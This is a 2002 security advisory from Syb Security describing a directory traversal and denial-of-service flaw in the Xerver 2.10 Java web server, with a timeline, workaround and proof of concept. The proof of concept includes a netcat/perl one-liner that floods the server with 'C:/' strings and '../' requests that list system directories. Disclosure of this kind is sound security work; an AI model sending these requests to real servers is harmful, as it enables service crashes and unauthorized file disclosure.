© Neurowork™ 2010. Todos los derechos reservados.
Syb Security
es una unidad de negocio de Neurowork™ |
Otras unidades de negocio
Acerca de Neurowork™ | Mapa del sitio | Términos de uso | Marcas registradas | Política de privacidad | Comentarios
redlink Buscar
 redlink Seleccione Idioma
print e-mail sitemap
Bookmark and Share

Advisories

SYBSEC-ADV03: Xerver Directory Traversal Vulnerability

Title
Xerver Directory Traversal Vulnerability
ID
SYBSEC-ADV03
Severity
MEDIUM - Directory Traversal Vulnerability
History
01.MAR.2002 Vulnerability discovered
08.MAR.2002 Vendor contacted
Scope
Remote Directory Traversal Vulnerability
Platforms
Any
Author
URL
http://www.sybsecurity.com/advisors/SYBSEC-ADV03-Xerver_Directory_Traversal_Vulnerability
Release
Public
Overview
Xerver is a freely available webserver, written in Java. It will run on any operating system with Java installed, including Microsoft Windows, Unix/Linux variants, MacOS, etc.
Affected versions
The vulnerability has been reported in versions WEB Server
Xerver 2.10
Description
Dot-dot-slash (../) sequences are not filtered from web requests. It is possible for a remote attacker to craft a malicious web request which is capable of breaking out of wwwroot. This has the potential to disclose arbitrary web-readable files to remote attackers.
It should be noted that webservers on Microsoft Windows operating systems normally run with SYSTEM privileges, meaning the attacker may potentially disclose the contents of any file.
Workaround
Upgrade the sofware version you can download from:
http://www.javascript.nu/xerver
Acknowledgments
This vulnerability have been found and researched by:
- Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
References
Details
A remote attacker can send a specially-crafted request containing a null character (%00) followed by malicious code in that would be executed in the victim's Web browser within the security context of the hosting site.

A remote attacker can connect to port 32123 and send multiple requests containing 'C:/' to cause the Web server to crash.

------oOo------
Proof of concept

Denial of Service (DoS)

http://localhost:32123

$ printf "GET /`perl -e 'print "C:/"x500000'` " |nc -vvn 127.0.0.1 32123

Explotation:

Example 1:

Via web:

http://localhost/unix/ALEX/Xerver2.10/../../../

Directory Listing for /

File name File size Last modified


ALEX
Documents and Settings
My Downloads
Program Files
RECYCLER

[/snip]

Example 2:

$ nc -vvn 127.0.0.1 80
(UNKNOWN) [127.0.0.1] 80 (?) open
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0

The results is:

Directory Listing for /WINNT/system32/

File name File size Last modified
../
AdCache
CatRoot
Com
DTCLog
DirectX
GroupPolicy
Hummbird
IOSUBSYS
Macromed
Microsoft

[/snip]
------oOo------